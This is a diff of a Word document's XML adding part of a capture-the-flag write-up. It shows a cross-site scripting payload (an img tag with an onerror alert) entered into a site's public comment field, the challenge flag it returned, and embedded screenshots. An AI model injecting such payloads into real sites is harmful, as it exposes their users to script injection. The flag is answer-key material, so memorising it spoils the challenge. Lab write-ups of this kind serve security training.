+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>The site features a public</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>comment or</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>feedback</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>section.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Honestly this one just worked with anything…</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>it tried both</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>message :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Test</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">message: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>img</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>src</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">=x </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>onerror</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>="alert(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>window.challengeFlags.xss</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)"&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>and got the same flag</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>FLAG{</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Nothig_is_for_free</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Here's the screenshots of me testing it out and confirming the flag</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="180B6508" wp14:editId="16CC919D">
+            <wp:extent cx="5928360" cy="3337560"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1487292544" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5928360" cy="3337560"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="194862F1" wp14:editId="17688CA1">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1925098016" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1925098016" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
@@ -1630,6 +2142,56 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -2234,6 +2796,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -2588,6 +3151,50 @@
       <w:color w:val="467886" w:themeColor="hyperlink"/>
       <w:u w:val="single"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Header">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="HeaderChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="009F235B"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4680"/>
+        <w:tab w:val="right" w:pos="9360"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
+    <w:name w:val="Header Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Header"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="009F235B"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Footer">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="FooterChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="009F235B"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4680"/>
+        <w:tab w:val="right" w:pos="9360"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
+    <w:name w:val="Footer Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Footer"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="009F235B"/>
   </w:style>
 </w:styles>
 </file>
